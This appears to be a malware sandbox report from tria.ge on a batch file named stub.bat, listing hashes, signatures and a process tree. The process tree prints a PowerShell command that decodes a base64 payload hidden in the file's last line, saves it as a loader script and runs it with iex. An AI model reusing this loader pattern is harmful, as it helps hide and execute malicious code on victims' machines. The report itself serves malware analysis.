Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

08/07/2024, 15:19

240708-sqj4jaxflf 10

08/07/2024, 13:40

240708-qyw2ys1gll 8

Analysis

  • max time kernel
    361s
  • max time network
    363s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    08/07/2024, 15:19

General

  • Target

    stub.bat

  • Size

    3.4MB

  • MD5

    c27b8c9f05c86817d8d287f0d0bd8698

  • SHA1

    239748a1871a85c7df6733bc24d9497a331aca87

  • SHA256

    cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1

  • SHA512

    fbd18278c1d8c18360f16cf11db634162cb7e14484853496670ca074e06cbd26f5933b9cd22046063da3f86c294c786c20a00545baa8cbdc76a6af61c55c7bca

  • SSDEEP

    49152:/mThC67EFbMUKiKknefnfIlTYhjwHs0j+VqdyvZWs6sT/Pj5wSe/XDX/DlbfZ5+m:n

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $env:LOCALAPPDATA\`$ktm-powershell.exe; $data = Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\stub.bat'; $lines = $data -split '\n';$last_line = $lines[-1]; $last_line = [Convert]::FromBase64String($last_line.Replace('\n', '')); $last_line = [System.Text.Encoding]::Unicode.GetString($last_line); [System.IO.File]::WriteAllText($env:LOCALAPPDATA + '\\$ktm-loader.ps1', $last_line); $last_line | iex"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2368

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2368-4-0x000007FEF5C6E000-0x000007FEF5C6F000-memory.dmp

    Filesize

    4KB

  • memory/2368-5-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

    Filesize

    2.9MB

  • memory/2368-6-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

  • memory/2368-7-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB

  • memory/2368-9-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB

  • memory/2368-10-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB

  • memory/2368-12-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB

  • memory/2368-13-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB

  • memory/2368-14-0x000000001BBC0000-0x000000001BBCE000-memory.dmp

    Filesize

    56KB

  • memory/2368-15-0x000000001ACE0000-0x000000001ADD0000-memory.dmp

    Filesize

    960KB

  • memory/2368-16-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB